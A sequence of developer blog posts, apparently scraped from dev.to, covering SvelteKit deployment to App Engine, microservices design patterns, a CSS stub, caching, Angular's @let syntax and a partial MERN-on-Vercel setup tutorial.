While you're still working on development code, VSCode offers you browser-like debugging facilities directly within your IDE. But personally, I've found these clunky and in practice I tend to rely simply on sprinkling `console.log` instructions over my code. Output for these appears in whatever terminal session you've used to launch your `npm run dev`.

But what if you've got a problem that can only be investigated on the live host?
Where would you go to look for log messages launched here? The answer, for a Google Cloud webapp is the "Google Cloud Logs Explorer" console. This, on first experience, is also quite a clunky brute. But, with experience, you'll appreciate that (rather like the browser's Inspector) it's a fine piece of software engineering that provides infinitely adaptable tools in one neat package. Embrace it! ### Building and Deploying a SvelteKit webapp to the Google Cloud If your webapp had been using React, as a Firebase developer you'd know that the next step is to use `npm run build` to create a runtime version of your code, followed by a `firebase deploy` to upload this to Google Cloud's Firebase hosting servers. But if you're using Svelte there's a problem. If your Sveltekit webapp uses server-side code to achieve its effects, you will need hosting for a Svelte server. Firebase hosting only serves webapp pages. You need a different type of hosting altogether - one that effectively lets you mimic the operation of the local Svelte server you've been running on your PC. Once you start looking closely, you'll discover that the Google Cloud provides a bewildering variety of facilities in this area. Typically, you might be interested in Google's "App Engine" and "Cloud Run" services. SvelteKit docs at [Building your App](https://kit.svelte.dev/docs/building-your-app) describe a build process that creates a "yaml" file that "provides an optimized production build of your server code and your browser code" serviced by an "adapter" to run on your specific environment (eg Google Cloud Run). But where would you find the necessary "adapter" and how would you choose the "specific environment"? Although Svelte provides official adapters for numerous environments (eg Netlify and Vercel) this list unfortunately doesn't include the Google Cloud. But "community" developers have stepped in and the one I've been using is called `svelte-adapter-appengine`, courtesy of Jonas Jongejan (HalfdanJ). This targets the Google Cloud App Engine environment (as described at [svelte-adapter-appengine README](https://github.com/HalfdanJ/svelte-adapter-appengine)) and so my requirement list is complete. Here's the procedure. 1. Install the package as a development dependency: `npm install --save-dev svelte-adapter-appengine` 2. Update your svelte.config.js to use the adapter: ```javascript import { vitePreprocess } from '@sveltejs/vite-plugin-svelte'; import adapter from "svelte-adapter-appengine"; /** @type {import('@sveltejs/kit').Config} */ const config = { preprocess: vitePreprocess(), kit: { adapter: adapter(), }, }; export default config; ``` 3. Build your application: `npm run build` 4. Deploy your application to App Engine: `gcloud app deploy --project <CLOUD_PROJECT_ID> build/app.yaml` Output from the deployment process will provide a url for your deployed webapp (eg https://myProject.nw.r.appspot.com). Feed that to the browser and be electrified by the shockingly fast response of your Sveltekit webapp. ### Postscript I hope you've enjoyed reading this post. Check out [NgateSystems](https://ngatesystems.com) for an index to the whole series and a super-useful keyword search facility. I'm conscious that I've only scratched the surface of what Svelte has to offer. This post has covered the basics and should be enough to enable you to develop a functional database access/maintenance system, but there's lots more to learn. Make sure that you check out Svelte docs for more information. Good luck with your coding. 
I, for one, shall certainly be using Svelte in future!
mjoycemilburn
1,919,534
19 Microservices Patterns for System Design Interviews
These are the common patterns for Microservice architecture which developers should learn for System Design interviews.
0
2024-07-14T09:36:37
https://dev.to/somadevtoo/19-microservices-patterns-for-system-design-interviews-3o39
microservices, softwaredevelopment, systemdesign, programming
---
title: 19 Microservices Patterns for System Design Interviews
published: true
description: These are the common patterns for Microservice architecture which developers should learn for System Design interviews.
tags: Microservices, softwaredevelopment, systemdesign, programming
# cover_image: https://direct_url_to_image.jpg
# Use a ratio of 100:42 for best results.
# published_at: 2024-07-11 09:50 +0000
---

*Disclosure: This post includes affiliate links; I may receive compensation if you purchase products or services from the different links provided in this article.*

[![19 Microservices Patterns for System Design Interviews ](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/b31ydwucircerujkyrnj.jpg)](https://bit.ly/3P3eqMN)

image_credit - [ByteByteGo](https://bit.ly/3P3eqMN)

Hello friends, if you are preparing for system design interviews then it makes sense to prepare for Microservices design patterns as well, not just to do well in interviews or make your architecture more robust, but also to understand existing projects.

Microservices patterns like Circuit Breaker, API Gateway, Saga, and Event Sourcing are tried and tested solutions to common Microservices problems. These patterns address [common challenges in microservices architectures](https://dev.to/somadevtoo/10-microservices-architecture-challenges-for-system-design-interviews-6g0) like scalability, fault tolerance, and data consistency.

In the past, I have talked about common system design questions like [API Gateway vs Load Balancer](https://dev.to/somadevtoo/difference-between-api-gateway-and-load-balancer-in-system-design-54dd), [Horizontal vs Vertical Scaling](https://dev.to/somadevtoo/horizontal-scaling-vs-vertical-scaling-in-system-design-3n09), and [Forward proxy vs reverse proxy](https://dev.to/somadevtoo/difference-between-forward-proxy-and-reverse-proxy-in-system-design-54g5), as well as common [System Design problems](https://dev.to/somadevtoo/top-50-system-design-interview-questions-for-2024-5dbk), and in this article I am going to share 19 key Microservices design patterns that are essential knowledge for technical interviews.

They are also among the [essential System design topics for interviews](https://medium.com/javarevisited/top-10-system-design-concepts-every-programmer-should-learn-54375d8557a6) and you must prepare them well.

Many companies use microservices, so understanding these patterns shows you're up-to-date with current trends. Knowing when and how to apply these patterns also demonstrates your ability to solve complex distributed system problems. These patterns often involve trade-offs, allowing you to showcase your analytical thinking, and interviewers often present scenarios where these patterns are relevant solutions.

By the way, if you are preparing for System design interviews and want to learn System Design in depth then you can also check out sites like [**ByteByteGo**](https://bit.ly/3P3eqMN), [**Design Guru**](https://bit.ly/3pMiO8g), [**Exponent**](https://bit.ly/3cNF0vw), [**Educative**](https://bit.ly/3Mnh6UR) and [**Udemy**](https://bit.ly/3vFNPid) which have many great System design courses and a System design interview template like this which you can use to answer any System Design question.
[![how to answer system design question](https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23jeu6ppweg5zt5prvhx.jpg)](https://bit.ly/3pMiO8g)

If you need more choices, you can also see this list of [best System Design courses](https://www.linkedin.com/pulse/10-best-system-design-courses-beginners-experienced-2023-soma-sharma/), [books](https://www.linkedin.com/pulse/8-best-system-design-books-programmers-developers-soma-sharma/), and [websites](https://javarevisited.blogspot.com/2022/08/top-7-websites-to-learn-system-design.html)

*P.S. Keep reading until the end. I have a free bonus for you.*

So, what are we waiting for? Let's jump right into it.

## 19 Microservices Design Patterns for System Design Interviews

[Microservices architecture](https://medium.com/javarevisited/difference-between-microservices-and-monolithic-architecture-for-java-interviews-af525908c2d5) is a design approach that structures an application as a collection of loosely coupled services. To build scalable, maintainable, and resilient microservices-based systems, various patterns have emerged. Here are essential microservices patterns you can use in your project and also remember for system design interviews.

### 1\. Service Registry

Since there are many microservices in a Microservice architecture, they need to discover and communicate with each other. A [Service Registry](https://medium.com/javarevisited/service-registry-design-pattern-in-microservices-explained-a796494c608e), such as Netflix Eureka or Consul, acts as a centralized directory where services can register themselves and discover others.

Here is how it looks:

[![Service Registry Pattern](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/a1zmvopa0oer8mo4qbas.png)](https://www.java67.com/2023/06/what-is-service-discovery-pattern-what.html)

------

### 2\. API Gateway

An [API Gateway](https://medium.com/javarevisited/what-is-api-gateway-pattern-in-microservices-architecture-what-problem-does-it-solve-ebf75ae84698) serves as a single entry point for client applications, aggregating multiple microservices into a unified API. It handles requests, routing them to the appropriate services, and may perform tasks like authentication, authorization, and load balancing.

Here is how an API Gateway looks:

[![API Gateway](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dquilct7nvdkgnn3tvrb.jpg)](https://medium.com/javarevisited/what-is-api-gateway-pattern-in-microservices-architecture-what-problem-does-it-solve-ebf75ae84698)

-----

### 3\. Circuit Breaker

Inspired by electrical circuit breakers, this pattern prevents a microservice failure from cascading to other services. The [Circuit breaker pattern](https://medium.com/javarevisited/what-is-circuit-breaker-design-pattern-in-microservices-java-spring-cloud-netflix-hystrix-example-f285929d7f68) monitors for failures, and if a threshold is crossed, it opens the circuit, preventing further requests. This helps in graceful degradation and fault tolerance, and it's absolutely a must in a Microservice architecture to prevent a total shutdown of your services.

Here is an example of Netflix Hystrix as a Circuit breaker:

[![Circuit Breaker](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4io0vvqpxxm5r61x2eco.png)](https://medium.com/javarevisited/what-is-circuit-breaker-design-pattern-in-microservices-java-spring-cloud-netflix-hystrix-example-f285929d7f68)
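For interviews it also helps to be able to sketch the mechanism itself. Here is a deliberately minimal, illustrative circuit breaker in plain Java (not the actual Hystrix implementation, just the core idea of counting failures and failing fast once a threshold trips):

```java
import java.util.function.Supplier;

// Toy sketch of the circuit breaker idea; real libraries like Hystrix or
// Resilience4j add timeouts, half-open probes, and metrics on top of this.
class SimpleCircuitBreaker {
    private int consecutiveFailures = 0;
    private final int threshold = 5;
    private boolean open = false;

    String call(Supplier<String> remoteService, String fallback) {
        if (open) {
            return fallback; // circuit is open: fail fast, don't call the service
        }
        try {
            String result = remoteService.get();
            consecutiveFailures = 0; // a success resets the failure count
            return result;
        } catch (RuntimeException e) {
            if (++consecutiveFailures >= threshold) {
                open = true; // too many failures: trip the circuit
            }
            return fallback;
        }
    }
}
```

A real implementation would also move the circuit to a "half-open" state after a cool-down period so traffic can be retried gradually.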
-------

### 4\. Bulkhead

In a microservices system, isolating failures is crucial. The Bulkhead pattern involves separating components or services to contain failures. For example, thread pools or separate databases for different services can be used to prevent a failure in one part of the system from affecting others.

Here is a diagram showing the Bulkhead pattern in a Microservices architecture:

![Bulkhead Pattern](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/q1lmbv2z4alb9rn4c52f.png)

------

### 5\. Saga Pattern

This pattern is used for managing distributed transactions. The Saga pattern breaks down a long-running business transaction into a series of smaller, independent transactions. Each microservice involved in the saga handles its own transaction and publishes events to trigger subsequent actions.

Here is how the [Saga Pattern](https://medium.com/javarevisited/what-is-saga-pattern-in-microservice-architecture-which-problem-does-it-solve-de45d7d01d2b) looks in action:

[![Saga Pattern](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y2s5glp78opmqqumjbha.png)](https://www.java67.com/2022/12/saga-microservice-design-pattern-in-java.html)

-------

### 6\. Event Sourcing

This is another popular pattern which is used heavily in high-frequency, low-latency applications. In this pattern, instead of storing only the current state, [Event Sourcing](https://medium.com/javarevisited/what-is-event-sourcing-design-pattern-in-microservices-architecture-how-does-it-work-b38c996d445a) involves storing a sequence of events that led to the current state. This pattern provides a reliable audit trail and allows for rebuilding the system state at any point in time.

Here is how Event Sourcing looks in action:

[![Event Sourcing](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/czu6xk96dsluau2wvdlz.png)](https://www.java67.com/2023/01/event-sourcing-pattern-in-java.html)

------

### 7\. Command Query Responsibility Segregation (CQRS)

The [CQRS Pattern](https://medium.com/javarevisited/what-is-cqrs-command-and-query-responsibility-segregation-pattern-7b1b38514edd) separates the read and write sides of an application. It uses different models for updating information (commands) and reading information (queries). This pattern can improve scalability, as read and write operations have different optimization requirements.

Here is a nice diagram which shows the CQRS pattern:

[![Command Query Responsibility Segregation (CQRS)](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y9cckf41czuapw0g8v5g.png)](https://javarevisited.blogspot.com/2023/04/what-is-cqrs-design-pattern-in.html)

-------

### 8\. Data Sharding

The database sharding pattern is used to distribute the database load and avoid bottlenecks. [Data Sharding](https://dev.to/somadevtoo/database-sharding-for-system-design-interview-1k6b) involves partitioning data across multiple databases or database instances. In this pattern, each microservice may handle a subset of data or specific types of requests.

Here is how database sharding looks (credit - [Design Guru](https://bit.ly/3pMiO8g)):

[![Types of Database sharding](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/42ob2tziqrlt820gdsy7.jpg)](https://bit.ly/3pMiO8g)

-------

### 9\. Polyglot Persistence

Different microservices may have different data storage needs. Polyglot Persistence allows using multiple database technologies based on the requirements of each microservice, optimizing for data storage, retrieval, and query capabilities.
Here is a nice diagram which shows Polyglot Persistence in Azure:

![Polyglot Persistence](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zadmkgdvmzkcvysmc4pa.PNG)

-------

### 10\. Retry

In a Microservice architecture, when a transient failure occurs, the Retry pattern involves retrying the operation instead of immediately failing. It can be applied at various levels, such as service-to-service communication or database interactions.

Here is a nice diagram from [ByteByteGo](https://bit.ly/3P3eqMN), a great place for system design learning, which shows the Retry pattern in Microservices:

![Retry Pattern in Microservices](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/e8kuq35ktdfxjfhecjoj.jpg)

-------

### 12\. Sidecar

The Sidecar pattern involves attaching a helper service (the sidecar) to the main microservice to provide additional functionalities such as logging, security, or communication with external services. This allows the main service to focus on its core functionality.

Here is how a Sidecar pattern looks:

![Sidecar pattern in Microservices](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/imhtu2b7mml6atekcqu6.png)

-----

### 13\. Backends for Frontends (BFF)

Also known as BFF, this pattern is useful when dealing with multiple client types (e.g., web, mobile): it involves creating separate backend services tailored for each type of client. This allows for optimized and specialized APIs for each client.

Here is how a Backends for Frontends (BFF) pattern looks:

![Backends for Frontends (BFF)](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/p1tdrwa7bzotkohzitpr.png)

------

### 14\. Shadow Deployment

The Shadow Deployment pattern involves routing a copy (shadow) of production traffic to a new microservice version without affecting the actual user experience. This is one of the popular deployment strategies and it helps validate the new version's performance and correctness.

Here is how shadow deployment looks:

![Shadow Deployment](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dopj5ojhur8zk8g84ytz.png)

------

### 15\. Consumer-Driven Contracts

In a microservices ecosystem, multiple services often interact with one another. The Consumer-Driven Contracts pattern involves consumers specifying their expectations from producers, allowing for more robust and coordinated changes.

Here is a nice diagram which explains Consumer-Driven Contracts:

[![Consumer-Driven Contracts](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lks09b6cxuhwea5la5pp.png)](https://javarevisited.blogspot.com/2021/09/microservices-design-patterns-principles.html)

-----

### 16\. Smart Endpoints, Dumb Pipes

This pattern advocates for placing business logic in microservices (smart endpoints) rather than relying on complex middleware. The communication infrastructure (pipes) should be simple and handle only message routing.

------

### 17\. Database per Service

This is another popular Microservices pattern where each microservice has its own database, and services communicate through well-defined APIs. The [Database per Service pattern](https://javarevisited.blogspot.com/2022/11/database-per-microservice-pattern-java.html) provides isolation but also requires careful consideration of data consistency and integrity.
Here is how this pattern looks:

[![Database per Service pattern](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/p1618z10nohkuvlyjl3a.png)](https://medium.com/javarevisited/what-is-database-per-microservices-pattern-what-problem-does-it-solve-60b8c5478825)

-------

### 18\. Async Messaging

Instead of synchronous communication between microservices, the Async Messaging pattern involves using message queues to facilitate asynchronous communication. This can improve system responsiveness and scalability.

Here is a nice diagram which shows the difference between sync and async messaging:

[![Async Messaging pattern](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gwi955d8eatod6zzmezh.png)](https://medium.com/javarevisited/how-microservices-communicates-with-each-other-synchronous-vs-asynchronous-communication-pattern-31ca01027c53)

-------

### 19\. Stateless Services

Designing microservices to be stateless simplifies scalability and resilience. Each service processes a request independently, without relying on stored state, making it easier to scale horizontally.

Here is a nice diagram which shows the difference between Stateless and Stateful Services:

[![Stateless Services](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qz3x92cb4v9yqoqqaqe3.png)](https://dev.to/somadevtoo/10-microservice-best-practices-for-building-scalable-and-resilient-apps-1p0j)

-------

### System Design Interviews Resources

And here is my curated list of the best system design books, online courses, and practice websites which you can check out to better prepare for System design interviews. Most of these courses also answer the questions I have shared here.

1. [**DesignGuru's Grokking System Design Course**](https://bit.ly/3pMiO8g): An interactive learning platform with hands-on exercises and real-world scenarios to strengthen your system design skills.

2. [**"System Design Interview" by Alex Xu**](https://amzn.to/3nU2Mbp): This book provides an in-depth exploration of system design concepts, strategies, and interview preparation tips.

3. [**"Designing Data-Intensive Applications"**](https://amzn.to/3nXKaas) by Martin Kleppmann: A comprehensive guide that covers the principles and practices for designing scalable and reliable systems.

4. [LeetCode System Design Tag](https://leetcode.com/explore/learn/card/system-design): LeetCode is a popular platform for technical interview preparation. The System Design tag on LeetCode includes a variety of questions to practice.

5. [**"System Design Primer"**](https://bit.ly/3bSaBfC) on GitHub: A curated list of resources, including articles, books, and videos, to help you prepare for system design interviews.

6. [**Educative's System Design Course**](https://bit.ly/3Mnh6UR): An interactive learning platform with hands-on exercises and real-world scenarios to strengthen your system design skills.

7. **High Scalability Blog**: A blog that features articles and case studies on the architecture of high-traffic websites and scalable systems.

8. **[YouTube Channels](https://medium.com/javarevisited/top-8-youtube-channels-for-system-design-interview-preparation-970d103ea18d)**: Check out channels like "Gaurav Sen" and "Tech Dummies" for insightful videos on system design concepts and interview preparation.

9. [**ByteByteGo**](https://bit.ly/3P3eqMN): A live book and course by Alex Xu for System design interview preparation. It contains all the content of the System Design Interview book volumes 1 and 2 and will be updated with volume 3, which is coming soon.
[**Exponent**](https://bit.ly/3cNF0vw): A specialized site for interview prep, especially for FAANG companies like Amazon and Google. They also have a great system design course and much other material that can help you crack FAANG interviews.

[![how to prepare for system design](https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkqv3p46jmw5qc0newuiu.jpg)](https://bit.ly/3P3eqMN)

image_credit - [ByteByteGo](https://bit.ly/3P3eqMN)

------

That's all about the **common Microservice patterns and concepts a developer should know**. These microservices patterns help address various challenges associated with building and maintaining distributed systems, providing solutions for communication, fault tolerance, data management, and scalability. When designing microservices architectures, combining these patterns judiciously can lead to a robust and resilient system.

These additional [microservices patterns](https://medium.com/javarevisited/top-10-microservice-design-patterns-for-experienced-developers-f4f5f782810e), when applied thoughtfully, contribute to building resilient, scalable, and maintainable distributed systems. The choice of patterns depends on the specific requirements and challenges faced during the design and implementation of microservices architectures.

### Bonus

As promised, here is the bonus for you: a free book. I just found a new free book to learn Distributed System Design, which you can read here on Microsoft's site ---

<https://info.microsoft.com/rs/157-GQE-382/images/EN-CNTNT-eBook-DesigningDistributedSystems.pdf>

[![free book to learn distributed system design](https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhrc1jn751mzs4ru91zt3.png)](https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhrc1jn751mzs4ru91zt3.png)

Thank you
somadevtoo
1,919,582
CSS All Tricks and Tips - Part 1
Index of this Post how to center container How to center container 'San...
0
2024-07-11T10:51:41
https://dev.to/jaiminbariya/css-all-tricks-and-tips-part-1-1c6d
## Index of this Post

1. [How to center container](#chapter-1)

### How to center container <a name="chapter-1"></a>

```
print("Hello JP")
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yrrltexzpsxhfejddci1.png)
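Since this chapter is about centering a container, here is a minimal sketch of the most common approach (my own illustrative snippet, with hypothetical class names):

```css
/* Center a child both horizontally and vertically with flexbox */
.parent {
  display: flex;
  justify-content: center; /* horizontal axis */
  align-items: center;     /* vertical axis */
  min-height: 100vh;       /* give the parent room to center within */
}
```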
jaiminbariya
1,919,668
The Benefits of Caching: Improving Web Performance and Responsiveness
Have you ever visited a website that was slow to load or experienced inconsistent performance?...
0
2024-07-16T07:00:00
https://devot.team/blog/benefits-of-caching
caching, webdev, programming
Have you ever visited a website that was slow to load or experienced inconsistent performance? Caching can solve these issues and more. In this article, we'll explore what caching is, how it works, and where it can be applied to improve website performance. We'll also discuss some common bottlenecks and scenarios where caching should be used. Whether you're a developer, a DevOps engineer, or an end user, caching can play a role in improving your experience with web applications.

**What is caching?**

As defined on AWS's site, a cache, in computing, is a high-speed data storage layer which stores a subset of data, typically transient in nature, so that future requests for that data are served up faster than is possible by accessing the data's primary storage location. Caching allows you to efficiently reuse previously retrieved or computed data.

**When should we use caching?**

Using a cache can be very useful. Here are some common scenarios where caching should be used:

- When a website or application is slow to load
- When infrastructure costs are too high
- When infrastructure resource monitors display high values
- When a website or application has inconsistencies in visits or load
- When developers have done a poor job implementing existing features

You can read more about it on our blog: https://devot.team/blog/benefits-of-caching
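As a quick illustration of the idea, here is a minimal cache-aside sketch (my own TypeScript example, not from the linked post): check a fast store first and fall back to the slow primary source only on a miss:

```typescript
// A minimal in-memory cache-aside sketch with a time-to-live (TTL).
const cache = new Map<string, { value: string; expiresAt: number }>();

async function getWithCache(
  key: string,
  loadFromSource: () => Promise<string>, // the slow primary store
  ttlMs = 60_000
): Promise<string> {
  const hit = cache.get(key);
  if (hit && hit.expiresAt > Date.now()) {
    return hit.value; // served from the high-speed layer
  }
  const value = await loadFromSource(); // cache miss: go to the source
  cache.set(key, { value, expiresAt: Date.now() + ttlMs });
  return value;
}
```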
ana_klari_e98cbb26da5af3
1,919,697
@let: New feature compiler in Angular 18.1
Introduction With the arrival of Angular 18.1, this version introduces an exciting new...
0
2024-07-17T09:19:30
https://dev.to/this-is-angular/let-new-feature-compiler-in-angular-181-jen
angular, news, javascript, webdev
## Introduction

With the arrival of Angular 18.1, this version introduces an exciting new feature to the compiler: the ability to declare one or more template variables. How is this feature used, and what are the different use cases? This article aims to answer these questions.

## The compiler's latest feature: @let

With the latest versions of Angular, the team has introduced new functionality into the compiler, and this functionality translates into the _@-syntax_. This is how the new control flow syntax came into being:

- @if
- @for
- @switch

and, more recently, **@let**.

As a general rule, the easiest way to create a template variable was to use either:

- the *ngIf structural directive with the `as` keyword, or
- the new control flow syntax, @if, with the `as` keyword

```html
<!-- older control flow syntax -->
<div *ngIf="user$ | async as user">
  {{ user.name }}
</div>

<!-- new control flow syntax -->
@if(user$ | async; as user){
  <div>{{ user.name }}</div>
}
```

This handy feature allowed us to store the result of the async pipe in a variable for use later in the template. However, this syntax raises a few questions. Here, the condition checks whether the return of the async pipe is truthy, and therefore whether the return value is different from any value considered false in JavaScript. This condition works really well if the return is an object or an array, but what if the return is a number, and particularly the number 0? With 0, the @if block would not render at all, so you end up writing convoluted checks like this:

```html
@if(((numbers$ | async) !== undefined && (numbers$ | async) !== null); as myNumber){
  <div>{{ myNumber }}</div>
}
```

This is where @let comes in. @let doesn't check a condition; it just allows you to declare a local template variable in a simple way, so the code example above becomes much simpler and more elegant to write:

```html
@let myNumber = (numbers$ | async) ?? 0;
<div>{{ myNumber }}</div>
```

This way, the myNumber variable will always be displayed.

## The different ways of using @let

One of the most classic scenarios with variable declaration is to store the result of a complex expression. It has always been inadvisable to call a function in a condition: at the slightest mouse movement or change in the template, the function was re-evaluated, which had an impact on performance. @let, as described above, does not evaluate a condition; it simply declares a local variable. This variable will be re-evaluated only if one of its dependencies changes. So calling a function is not a bad idea for complex expressions:

```html
<ul>
  @for(user of users(); track user.id) {
    @let isAdmin = checkIfAdmin(user);
    <li>User is admin: {{ isAdmin }}</li>
  }
</ul>
```

### Using @let with signals

@let is compatible with signals, and is used as follows:

```html
@let userColor = user().preferences?.colors?.primaryColor || 'white';
<span>user favorite color is {{ userColor }}</span>
```

### @let and JavaScript expressions

As you can see, @let can be used to evaluate any kind of JavaScript expression, apart from, for example, the instantiation of a class. In this way, arithmetic operators are interpreted, and several variables can be declared on several different lines or just on one line.
```html
<div>
  @for (score of scores(); track $index) {
    @let doubled = score * 2, max = calcMax(score);
    <h1>doubled score: {{ doubled }}, max: {{ max }}</h1>
  }
</div>
```

(Note that a @let variable is read-only and cannot reference itself, so accumulating a running total like `total = total + score` is not possible; the example above instead declares two independent variables on one line.)

## Other cool things that @let brings

As described above, the behaviour of @let is very similar to the behaviour of let in JavaScript, which has the following benefits:

- the scope works like the let scope in JavaScript
- better type inference in the template
- an error is raised if a variable (let) is used before being declared
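For instance, here is a minimal scoping sketch (my own illustrative template, not from the original article): the variable exists only inside the block that declares it:

```html
@if (user(); as currentUser) {
  @let greeting = 'Hello, ' + currentUser.name;
  <span>{{ greeting }}</span>
}
<!-- Referencing {{ greeting }} out here would raise a compile-time error:
     the @let variable is scoped to the @if block that declared it. -->
```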
nicoss54
1,919,795
Setting up a full-stack MERN (MongoDB, Express, React, Node.js) app for deployment on Vercel.
The MERN stack, comprising MongoDB, Express, React, and Node.js, is one of several technological...
0
2024-07-14T00:17:00
https://toki-adedapo.com/setting-up-a-full-stack-mern-mongodb-express-react-nodejs-app-for-deployment-on-vercel
serverless, node, react, mongodb
The MERN stack, comprising MongoDB, Express, React, and Node.js, is one of several technological combinations used for building full-stack web applications.

Vercel provides a versatile platform capable of deploying a wide range of frameworks and technologies for various project types. While often associated with frontend hosting, Vercel also supports backend deployments, making it suitable for MERN applications.

This article will guide you through the process of setting up a MERN stack application and deploying it on Vercel. We'll cover the steps from local development to deployment, showing how to utilize Vercel's free tier for testing your project and, if desired, hosting it long-term. By the end of this guide, you'll understand how to leverage the MERN stack and Vercel's deployment capabilities to bring your web application online and make it accessible to users.

**Setting up the Development Environment**

To begin, you'll need to install the following tools:

1. Node.js and npm
   - Visit [https://nodejs.org/en/download/package-manager](https://nodejs.org/en/download/package-manager)
   - Download and install the LTS (Long Term Support) version
   - This installation includes npm (Node Package Manager)
2. Visual Studio Code (VS Code):
   - Visit [https://code.visualstudio.com/download](https://code.visualstudio.com/download)
   - Download and install the version appropriate for your operating system

After installation, verify that Node.js and npm are correctly installed by opening a terminal or command prompt and running:

```
node --version
npm --version
```

Output>>>>>

```
Microsoft Windows [Version 10.0.22000.3079]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>node --version
v18.14.2

C:\Windows\system32>npm --version
9.5.0

C:\Windows\system32>
```

**Creating a new React app**

1. Open your terminal or command prompt
2. Navigate to the directory where you want to create your project
3. Run the following command:

```
npx create-react-app client
```

4. Once the installation is complete, navigate into your new project directory:

```
cd client
```

5. Start the development server to ensure everything is working:

```
npm start
```

Your default web browser should open and display the default React app page.

**Setting up the Node.js/Express server**

1. In your terminal, navigate back to your main project directory
2. Create a new directory for your server:

```
mkdir server
cd server
```

3. Initialize a new Node.js project:

```
npm init -y
```

4. Install the necessary dependencies (nodemon is added as a dev dependency because the start script below uses it):

```
npm i express body-parser mongodb mongoose cors dotenv
npm i -D nodemon
```

5. Create a new file named index.js in the server directory and add the following basic Express server setup:

```
// index.js
require('dotenv').config();
const express = require('express');
const bodyParser = require('body-parser');
const cors = require('cors');

const app = express();

app.use(cors());
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));
app.use(express.json());

app.use("/", (req, res) => {
    res.send("Server running.");
});

const port = process.env.PORT || 9000;
app.listen(port, () => {
    console.log(`Server is running on port ${port}`);
});
```

6. Add a start script to your package.json file in the server directory:

```
"scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "start": "nodemon index.js"
},
```

7.
Start your server:

```
npm start build
```

Output>>>>>>

```
PS C:\Users\Matrix\Documents\D.M.F\server> npm start build

> server@1.0.0 start
> nodemon index.js build

[nodemon] 3.1.0
[nodemon] to restart at any time, enter `rs`
[nodemon] watching path(s): *.*
[nodemon] watching extensions: js,mjs,cjs,json
[nodemon] starting `node index.js build`
Server is running on port 9000
```

**Configuring the Backend**

Create a new file named `db.js` in your backend directory (the Express app will require it as `./db` below) and add the following code:

```
const mongoose = require('mongoose');

const connectDB = async () => {
  try {
    await mongoose.connect(process.env.MONGODB_URI, {
      useNewUrlParser: true,
      useUnifiedTopology: true,
    });
    console.log('MongoDB connected successfully');
  } catch (error) {
    console.error('MongoDB connection error:', error);
    process.exit(1);
  }
};

module.exports = connectDB;
```

**Setting up MongoDB connection and Creating environment variables**

1. Log in to your MongoDB Atlas account [https://www.mongodb.com/cloud/atlas/register](https://www.mongodb.com/cloud/atlas/register)
2. Navigate to your cluster's Network Access settings
3. Click on "Add IP Address".
4. To allow connections from any IP address (suitable for development but should be restricted for production), enter:
   IP Address: 0.0.0.0/0
   Description: Allow access from anywhere
5. Click "Confirm".

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s3alpo7jqm1k92b9ljs1.png)

_Important:_

> Allowing access from 0.0.0.0/0 means your database can be accessed from any IP address. This is convenient for development and testing, but for a production environment, you should restrict access to only the necessary IP addresses or ranges for security reasons.

Create a .env file in your backend directory and add your MongoDB connection string:

```
MONGODB_URI=your_mongodb_connection_string_here
PORT=9000
```

Replace `your_mongodb_connection_string_here` with your actual MongoDB Atlas connection string.

**Structuring the Express app**

Now, update the `index.js` file to incorporate these changes:

```
require('dotenv').config();
const express = require('express');
const bodyParser = require('body-parser');
const cors = require('cors');
const connectDB = require('./db');

const app = express();

// Connect to MongoDB
connectDB();

// Middleware
app.use(cors());
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));
app.use(express.json());

// Routes
app.get("/", (req, res) => {
    res.send("Server deployed and running on vercel.");
});

// You can add more route files here as your application grows
// app.use('/api/users', require('./routes/users'));
// app.use('/api/posts', require('./routes/posts'));

const port = process.env.PORT || 9000;
app.listen(port, () => {
    console.log(`Server is running on port ${port}`);
});
```

**Developing the Frontend**

For the purpose of this article, we'll be using the following structure to illustrate how to organize a React frontend. Keep in mind that React is highly flexible, and you can adapt this organization to best suit your project's specific requirements.

**React App Structure**

Let's consider the following structure for our React application:

```
client/
├── src/
│   ├── components/
│   ├── services/
│   ├── styles/
│   ├── App.js
│   └── index.js
├── package.json
└── README.md
```

- components/: Contains all React components
- services/: Houses API-related code
- styles/: Stores CSS files

**Creating Necessary Components**

For this project, I've created several key components.
Here's an example of one of the main components, `UserManagement.js`:

```
import React, { useEffect, useState } from 'react';
import api from '../services/api';
import IncomingRequestTable from './IncomingRequestTable';
import MembersTable from './MembersTable';
import VolunteerTable from './VolunteerTable';
import './user-management.css';

const UserManagement = () => {
  const [showIncomingRequests, setShowIncomingRequests] = useState(true);
